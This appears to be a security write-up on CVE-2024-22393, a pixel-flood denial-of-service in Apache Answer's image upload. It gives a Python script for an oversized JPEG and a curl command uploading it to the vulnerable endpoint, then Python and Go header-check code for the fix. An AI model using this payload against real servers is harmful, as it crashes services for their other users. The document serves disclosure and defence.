CVE-2024-22393 is a denial-of-service vulnerability in Apache Answer (affected versions through 1.2.1) in which the upload handler does not restrict the file type or pixel dimensions of images submitted by users (CWE-770, allocation of resources without limits or throttling). Any logged-in user can upload a specially crafted image file that declares a very high pixel count; when the server decodes or resizes it, the pixel buffer exhausts available memory (an out-of-memory condition), crashing the process or the host.


> Vulnerable Product: Apache Answer
> Versions Affected: All through 1.2.1
> Patched Version: 1.2.5
> References:
> - Apache Answer Security Advisory
> - CVE Details

Why Is This Dangerous?

Any authenticated user, with no special privileges, can upload an image declaring, say, 100,000 x 100,000 pixels. The server tries to decode or resize that image in memory, and the decoded bitmap (several bytes per pixel, so tens of gigabytes for 10 gigapixels) quickly exhausts RAM, taking down the Answer instance and possibly the host with it.

This is known as a *Pixel Flood Attack*.

The upload form does not properly check file types or pixel dimensions, so anyone who can log in and make a post with an image attached can launch this attack. A byte-size limit alone does not help: the crafted file is small on disk and only becomes enormous when decoded.

Technical Breakdown

- Image upload endpoint: /api/v1/file/upload

You can generate a huge JPEG with Python and Pillow. libjpeg refuses to encode any dimension above 65,500 px, so 60,000 px per side is the practical ceiling for a single JPEG:

from PIL import Image

# Pillow allocates the full canvas before encoding (4 bytes per pixel for RGB),
# so this needs roughly 14 GB of RAM on the attacker's machine. Mode "L"
# (1 byte per pixel, white = 255) cuts that to about 3.6 GB; the server-side
# effect depends only on the declared dimensions, not on the mode.
img = Image.new("RGB", (60000, 60000), color=(255, 255, 255))

# Keep each side under libjpeg's 65,500 px limit or save() fails.
img.save("huge.jpg", "JPEG", quality=90)

> This yields a 60,000 x 60,000 pixel (3.6 gigapixel) image. The file stays far smaller than the bitmap because the uniform white blocks compress well, but any decoder that honours the header must allocate the full 60,000 x 60,000 x 3 bytes, roughly 10 GB, before it can resize or thumbnail it.

Upload it to the vulnerable endpoint with curl (or Postman), authenticated as an ordinary user:

curl -X POST "https://[your-apache-answer-instance]/api/v1/file/upload" \
  -H "Authorization: Bearer YOUR_JWT_TOKEN" \
  -F "file=@huge.jpg"

On receiving the file, the server attempts to decode and process it.

Expected result:
On a typical machine or VM, memory use spikes, the application becomes sluggish and then crashes (or is killed by the kernel's OOM killer), and in the worst case the whole host stops responding. Every other user is denied service until the process is restarted.

Patch & Fix

Upgrade to Apache Answer version 1.2.5 or later, which includes checks to restrict the maximum dimensions and file size for image uploads. Note that the dimension check is the part that matters: it must be made on the declared width and height before any pixel data is decoded, since the file itself can be small.

Example Patch Check (Pseudo-code)

from PIL import Image, UnidentifiedImageError
import io

MAX_DIM = 4096                                  # illustrative limit, not Answer's actual value
ALLOWED_FORMATS = {"JPEG", "PNG", "GIF", "WEBP"}

def handle_upload(data: bytes):
    # Image.open() parses only the header, so the declared size is known before
    # any pixel is decoded. Pillow itself raises DecompressionBombError here when
    # the pixel count exceeds 2 * Image.MAX_IMAGE_PIXELS (about 179 Mpx by default).
    try:
        img = Image.open(io.BytesIO(data))
    except UnidentifiedImageError:
        raise ValueError("not a recognised image")
    if img.format not in ALLOWED_FORMATS:
        raise ValueError(f"unsupported image type: {img.format}")
    w, h = img.size
    if w > MAX_DIM or h > MAX_DIM:
        raise ValueError(f"image dimensions too large: {w}x{h}")
    return img  # safe to call img.load() or resize now
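Apache Answer itself is written in Go, so the same check in that stack looks as follows. This is an added example written for this page, not code from the Apache Answer project or its fix; the byte, width, height and pixel limits and the error names are assumed for illustration. Go's image.DecodeConfig reads only the header (the PNG IHDR chunk or the JPEG SOF marker), so dimensions can be rejected before any pixel buffer exists, which is the defence the page describes. The block also makes the "small file, huge decode" point from the Technical Breakdown concrete: its constructed fixture is a 33-byte PNG header declaring 60,000 x 60,000 pixels, which the vulnerable path would accept and the hardened path rejects from the header alone.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"hash/crc32"
	"image"
	_ "image/jpeg" // registers the JPEG decoder for image.DecodeConfig/Decode
	"image/png"    // registers PNG and provides an encoder for a real fixture
)

// Illustrative limits (assumed for this example, not Apache Answer's values).
const (
	maxUploadBytes = 4 << 20  // 4 MiB on the wire
	maxWidth       = 4096     // px
	maxHeight      = 4096     // px
	maxPixels      = 16 << 20 // 16 Mpx decoded
)

var (
	ErrTooManyBytes = errors.New("upload exceeds byte limit")
	ErrTooLarge     = errors.New("image dimensions exceed limit")
	ErrBadFormat    = errors.New("unsupported image format")
)

// UnsafeDecode is the vulnerable pattern: decode first, ask questions later.
// For an 8-bit RGB PNG, Go allocates width*height*4 bytes as soon as the first
// IDAT chunk is seen, so a 60000x60000 header costs ~14 GB whatever the file size.
func UnsafeDecode(data []byte) (image.Image, error) {
	img, _, err := image.Decode(bytes.NewReader(data))
	return img, err
}

// CheckImageHeader validates an upload without touching pixel data:
// image.DecodeConfig parses only the header, so the declared dimensions are
// known before any pixel buffer is allocated.
func CheckImageHeader(data []byte) (image.Config, string, error) {
	if len(data) > maxUploadBytes {
		return image.Config{}, "", ErrTooManyBytes
	}
	cfg, format, err := image.DecodeConfig(bytes.NewReader(data))
	if err != nil {
		return image.Config{}, "", err // image.ErrFormat for non-images
	}
	if format != "png" && format != "jpeg" { // file-type allowlist
		return cfg, format, ErrBadFormat
	}
	if cfg.Width > maxWidth || cfg.Height > maxHeight ||
		int64(cfg.Width)*int64(cfg.Height) > maxPixels {
		return cfg, format, ErrTooLarge
	}
	return cfg, format, nil
}

// SafeDecode is the hardened pattern: header check, then decode.
func SafeDecode(data []byte) (image.Image, error) {
	if _, _, err := CheckImageHeader(data); err != nil {
		return nil, err
	}
	return UnsafeDecode(data)
}

// FakePNGHeader is a constructed fixture: a valid PNG signature plus an IHDR
// chunk declaring width x height, and nothing else. It is 33 bytes long.
func FakePNGHeader(width, height int) []byte {
	ihdr := make([]byte, 13)
	binary.BigEndian.PutUint32(ihdr[0:4], uint32(width))
	binary.BigEndian.PutUint32(ihdr[4:8], uint32(height))
	ihdr[8] = 8 // bit depth
	ihdr[9] = 2 // colour type 2 = truecolour RGB; bytes 10..12 stay 0
	chunk := append([]byte("IHDR"), ihdr...)
	var buf bytes.Buffer
	buf.Write([]byte{0x89, 'P', 'N', 'G', '\r', '\n', 0x1a, '\n'})
	buf.Write(be32(uint32(len(ihdr))))
	buf.Write(chunk)
	buf.Write(be32(crc32.ChecksumIEEE(chunk))) // PNG CRC covers type + data
	return buf.Bytes()
}

// SmallPNG encodes a real, harmless width x height image for comparison.
func SmallPNG(width, height int) []byte {
	var buf bytes.Buffer
	if err := png.Encode(&buf, image.NewRGBA(image.Rect(0, 0, width, height))); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func be32(v uint32) []byte {
	b := make([]byte, 4)
	binary.BigEndian.PutUint32(b, v)
	return b
}

func main() {
	samples := []struct {
		name string
		data []byte
	}{
		{"60000x60000 PNG header only", FakePNGHeader(60000, 60000)},
		{"real 16x16 PNG", SmallPNG(16, 16)},
		{"not an image", []byte("hello, not an image")},
	}
	for _, s := range samples {
		cfg, format, err := CheckImageHeader(s.data)
		fmt.Printf("%-28s bytes=%-4d format=%-6q size=%dx%d err=%v\n",
			s.name, len(s.data), format, cfg.Width, cfg.Height, err)
	}
}
```

In a real handler the byte cap belongs in front of the body read (http.MaxBytesReader on the request body) rather than on a buffered slice, but the ordering is the point: dimensions from the header, then the allowlist, and only then image.Decode.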

Conclusion

CVE-2024-22393 is a textbook case of why file upload and image processing endpoints must *never trust user input*. Even simple image uploads can bring down powerful servers if you are not careful. If you are running Apache Answer < 1.2.5, patch ASAP.

Further Reading:
- Official Fix Pull Request
- Security Best Practices for File Uploads


Stay safe and always validate, restrict, and sanitize uploads!

Timeline

Published on: 02/22/2024 10:15:08 UTC
Last modified on: 08/01/2024 13:46:55 UTC